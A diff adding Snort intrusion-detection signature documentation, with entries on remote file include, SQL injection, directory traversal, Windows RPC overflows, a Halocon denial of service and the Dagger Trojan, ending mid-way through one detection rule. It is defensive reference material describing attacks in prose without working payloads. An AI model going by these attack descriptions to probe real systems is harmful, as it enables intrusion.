+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Sourcefire Technical Publications Team
+Jennifer Harvey <jennifer.harvey@sourcefire.com>
+
+-- 
+Additional References:
+Bugtraq
+http://www.securityfocus.com/bid/4023
+
+--
--- /dev/null
+++ b/doc/signatures/1463.txt
@@ -0,0 +1,53 @@
+Rule:
+
+--
+Sid: 1463
+
+--
+Summary:
+This event is generated when activity relating to network chat clients is detected.
+
+--
+Impact:
+Policy Violation. Use of chat clients to communicate with unkown external sources may be against the policy of many organizations.
+
+--
+Detailed Information:
+Instant Messaging (IM) and other chat related client software can allow users to transfer files directly between hosts. This can allow malicious users to circumvent the protection offered by a network firewall.
+
+Vulnerabilities in these clients may also allow remote attackers to gain unauthorized access to a host.
+
+--
+Attack Scenarios:
+A user may transfer sensitive company information to an external party using the file transfer capabilities of an IM client.
+
+An attacker might utilize a vulnerability in an IM client to gain access to a host, then upload a Trojan Horse program to gain control of that host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow the use of IM clients on the protected network and enforce or implement an organization wide policy on the use of IM clients.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <brian.caswell@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+IRC Protocol
+http://www.irchelp.org/irchelp/rfc/
+
+--
--- /dev/null
+++ b/doc/signatures/2400.txt
@@ -0,0 +1,60 @@
+Rule:  
+
+--
+Sid:
+2400
+
+--
+Summary:
+This event is generated when an attempt is made to access the CGI script
+edittag.pl.
+
+--
+Impact:
+Information Disclosure
+
+--
+Detailed Information:
+EditTag is a perl script that can be used to manage web site content.
+
+The edittag.pl CGI script may allow an attacker to leverage a directory
+traversal attack on a web server. Due to insufficient checks on user
+supplied input, it may be possible for an attacker to supply encoded
+"../" characters to traverse out of the web root and view sensitive
+system files on the web server.
+
+--
+Affected Systems:
+	EditTag
+
+--
+Attack Scenarios:
+An attacker can utilize this vulnerability to gain sensitive information
+that may be used in further attacks against the host.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version.
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000338.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000338
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "phpMyDirectory" application running on a webserver. Access to the file "header.php" using a remote file being passed as the "ROOT_PATH" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "ROOT_PATH" parameter in the "header.php" script used by the "phpMyDirectory" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using phpMyDirectory
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/100000776.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000776
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection vulnerability in the "Blog CMS" application running on a webserver. Access to the file "index.php" with SQL commands being passed as the "query" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a remote machine via the "query" parameter in the "index.php" script used by the "Blog CMS" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to compromise the database backend for the application, the attacker may also be able to execute system binaries or malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Blog CMS
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application if user input is not correctly sanitized or checked before passing that input to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
--- /dev/null
+++ b/doc/signatures/832.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+832
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1738.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1738
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1569.txt
@@ -0,0 +1,68 @@
+Rule:  
+
+--
+Sid:
+1569
+
+--
+Summary:
+This event is generated when an attempt is made to execute a directory
+traversal attack.
+
+--
+Impact:
+Information disclosure. This is a directory traversal attempt which can
+lead to information disclosure and possible exposure of sensitive
+system information.
+
+--
+Detailed Information:
+Directory traversal attacks usually target web, web applications and ftp
+servers that do not correctly check the path to a file when requested by
+the client.
+
+This can lead to the disclosure of sensitive system information which may
+be used by an attacker to further compromise the system.
+
+--
+Affected Systems:
+
+	AHG EZshopper v3.0 and v2.0 for UNIX
+
+--
+Attack Scenarios:
+An authorized user or anonymous user can use the directory traversal 
+technique, to browse folders outside the ftp root directory. Information
+gathered may be used in further attacks against the host.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade the software to the latest non-affected version.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+NSFocus:
+http://www.nsfocus.com/english/homepage/research/0009.htm
+
+--
--- /dev/null
+++ b/doc/signatures/2310.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+2310
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the Microsoft Windows Workstation service.
+
+--
+Impact:
+Serious. Denial of Service (DoS), execution of arbitrary code is
+possible.
+
+--
+Detailed Information:
+Due to insufficient bounds checking in the Microsoft Windows Workstation
+service, it may be possible for an attacker to overwrite portions of
+memory. This can result in the attacker being presented with the
+opportunity to execute code of their choosing. Under some circumstances
+a Denial of Service condition may be possible against the target host.
+
+Specifically, the DCE/RPC service allows for overly long strings to be
+sent to the Workstation logging function. This logging function does not
+check parameters sufficiently which results in the buffer overflow
+condition.
+
+--
+Affected Systems:
+	Microsoft Windows 2000 Service Pack 2, Service Pack 3, Service Pack 4
+	Microsoft Windows XP, Microsoft Windows XP Service Pack 1
+	Microsoft Windows XP 64-Bit Edition
+
+--
+Attack Scenarios:
+The attacker may use one of the available exploits to target a
+vulnerable host.
+
+--
+Ease of Attack:
+Simple. Exploit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches and service packs.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CERT:
+http://www.cert.org/advisories/CA-2003-28.html
+http://www.kb.cert.org/vuls/id/567620
+
+Microsoft:
+http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS03-049.asp
+
+--
--- /dev/null
+++ b/doc/signatures/3305.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3305
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3299.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3299
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000102.txt
@@ -0,0 +1,62 @@
+Rule: 
+
+--
+Sid: 
+100000102
+
+-- 
+Summary: 
+This event is generated when an empty UDP packet is sent to port 2305, where 
+Halocon game servers typically listen.
+
+-- 
+
+Impact: 
+After receiving such a packet, the server will no longer listen on this port, 
+denying the administrator the ability to send remote commands.
+
+--
+Detailed Information:
+Halocon servers listen to UDP port 2305 for commands. Upon receiving an empty 
+UDP packet to that port, the server shuts down the port. Administrators can no 
+longer send remote commands to the server, effectively causing a denial of 
+service. The server must be restarted to re-open the port.
+
+--
+Affected Systems:
+Halocon 2.0.0.81
+
+--
+
+Attack Scenarios: 
+A script that generates empty UDP packets can be used to perform this attack.
+
+-- 
+
+Ease of Attack: 
+Simple; public exploits exist.
+
+-- 
+
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+
+Corrective Action: 
+No known patches or workarounds exist. System administrators may be able to 
+reject these packets at their firewall, depending upon the abilities of the 
+firewall system they use.
+
+--
+Contributors: 
+Alex Kirk <alex.kirk@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3257.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3257
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/104.txt
@@ -0,0 +1,107 @@
+Rule:
+
+--
+Sid:
+104
+
+--
+Summary:
+Dagger is a Trojan Horse.
+
+--
+Impact:
+Possible theft of data and control of the targeted machine leading to a 
+compromise of all resources the machine is connected to. This Trojan 
+also has the ability to delete data, steal passwords and disable the 
+machine.
+
+--
+Detailed Information:
+This Trojan affects the following operating systems:
+
+	Windows 95
+	Windows 98
+	Windows ME
+	Windows NT
+	Windows 2000
+	Windows XP
+
+No other systems are affected. This is a windows exceutable that makes 
+changes to the system registry, Win.ini and System.ini. When first 
+executed the Trojan replicates itself and in most cases, gives the copy 
+a random name. This Trojan may use the file extensions ".exe" or ".dll".
+
+The Trojan changes system startup files and registry settings to add the
+server to programs normally started on boot.
+
+	SID	Message
+	---	-------
+	104	Dagger_1.4.0_client_connect (incoming TCP connection)
+	105	Dagger_1.4.0 (outgoing TCP connection)
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This 
+event is indicative of an existing infection being activated. Initial 
+compromise can be in the form of a Win32 installation program that may 
+use the extension ".jpg" or ".bmp" when delivered via e-mail for 
+example.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised. 
+Updated virus definition files are essential in detecting this Trojan.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+This is a particularly difficult Trojan to remove and should only be 
+attempted by an experienced Windows Administrator.
+
+Edit the system registry to remove the extra keys or restore a 
+previously known good copy of the registry.
+
+Affected registry keys are:
+
+	[HKEY_CLASSES_USER\Software\Microsoft\Windows\CurrentVersion\RunServices]
+	[HKEY_CLASSES_USER\Software\Microsoft\Windows\CurrentVersion\Run] 
+	[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
+
+Registry keys added are:
+
+	"SysManager"="C:\\WINDOWS\\System\\Manager.exe"
+
+Removal of the file Manager.exe is required. Also end the process 
+Manager.exe.
+
+A machine reboot may be required to clear the existing process from 
+running in memory.
+
+--
+Contributors:
+Original Rule Writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Whitehats arachNIDS
+http://www.whitehats.com/info/IDS484
+
+TLSecurity
+http://www.tlsecurity.net/backdoor/Dagger.1.4.html (link appears to be 
+inactive)
+
+Dark-e
+http://www.dark-e.com/archive/trojans/dagger/140/index.shtml
+
+--
--- /dev/null
+++ b/doc/signatures/2308.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+2308
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the Microsoft Windows Workstation service.
+
+--
+Impact:
+Serious. Denial of Service (DoS), execution of arbitrary code is
+possible.
+
+--
+Detailed Information:
+Due to insufficient bounds checking in the Microsoft Windows Workstation
+service, it may be possible for an attacker to overwrite portions of
+memory. This can result in the attacker being presented with the
+opportunity to execute code of their choosing. Under some circumstances
+a Denial of Service condition may be possible against the target host.
+
+Specifically, the DCE/RPC service allows for overly long strings to be
+sent to the Workstation logging function. This logging function does not
+check parameters sufficiently which results in the buffer overflow
+condition.
+
+--
+Affected Systems:
+	Microsoft Windows 2000 Service Pack 2, Service Pack 3, Service Pack 4
+	Microsoft Windows XP, Microsoft Windows XP Service Pack 1
+	Microsoft Windows XP 64-Bit Edition
+
+--
+Attack Scenarios:
+The attacker may use one of the available exploits to target a
+vulnerable host.
+
+--
+Ease of Attack:
+Simple. Exploit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches and service packs.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CERT:
+http://www.cert.org/advisories/CA-2003-28.html
+http://www.kb.cert.org/vuls/id/567620
+
+Microsoft:
+http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS03-049.asp
+
+--
--- /dev/null
+++ b/doc/signatures/1897.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid: 1897
+
+--
+Summary:
+This event is generated when an attempt is made to exploit 
+vulnerable versions of the Kerberos version 4 administration daemon 
+(kadmind).
+
+--
+Impact:
+Serious. System compromize presenting the attacker with the opportunity to execute arbitrary code or gain unauthorized access to the target host along with other hosts in the kerberos realm.
+
+--
+Detailed Information:
+kadmind is used to administer a Kerberos database on the master key distribution center (KDC) of a kerberos realm.
+
+A buffer overflow condition exists in kadmind4 such that when the daemon parses a length value in an administration request the attacker can gain the ability to execute arbitrary code with the privileges of the user running the daemon, usually root.
+
+Authentication is not required to cause the overflow.
+
+Affected Systems:
+	Multiple vendors using kadmind version 4
+
+--
+Attack Scenarios:
+Exploit scripts are available
+
+--
+Ease of Attack:
+Simple. Exploits are available.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <brian.caswell@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CERT:
+http://www.cert.org/advisories/CA-2002-29.html
+http://www.kb.cert.org/vuls/id/875073
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1235
+
+--
--- /dev/null
+++ b/doc/signatures/100000590.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000590
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "editor_add.php" using a remote file being passed as the 
+"admin_template_path" parameter may indicate that an exploitation attempt has 
+been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the "editor_add.php" 
+script used by the "Indexu" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/2306.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+Sid:
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the PHP web application Gallery running on a server.
+
+--
+Impact:
+Possible execution of arbitrary code.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to include script when
+accessing the file index.php for the PHP application Gallery. This
+application fails to properly check the source of an included file in
+the script index.php. As a result an attacker is presented with the
+opportunity to execute code of their choosing with the privileges of the
+user running the web server.
+
+--
+Affected Systems:
+	All systems running the PHP application Calerndar.
+
+--
+Attack Scenarios:
+An attacker can include code of their choosing by supplying a URI to
+their script as a parameter to the HTTP GET request.
+
+--
+Ease of Attack:
+Simple. No exploit required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2494.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+2494
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the Microsoft RPC service.
+
+--
+Impact:
+Denial of Service (DoS). Possible execution of arbitrary code leading to
+unauthorized remote access to the victim host.
+
+--
+Detailed Information:
+It may be possible for an attacker to cause a DoS condition in the
+Microsoft RPC service when multiple simultaneous requests are made to a
+vulnerable host. This can lead to an exhaustion of system resources
+causing the DoS.
+
+--
+Affected Systems:
+	Windows systems running RPC services
+
+--
+Attack Scenarios:
+An attacker may attempt to bind to the RPC service many times in an
+attempt to cause the DoS condition to occur.
+
+--
+Ease of Attack:
+Difficult.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000438.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000438
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Claroline" application running on a webserver. Access to the file "mambo.inc.php" using a remote file being passed as the "includepath" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "includepath" parameter in the "mambo.inc.php" script used by the "Claroline" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Claroline
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/3430.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3430
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2464.txt
@@ -0,0 +1,70 @@
+Rule:
+alert ip any any -> any any (msg:"EXPLOIT EIGRP prefix length overflow attempt";
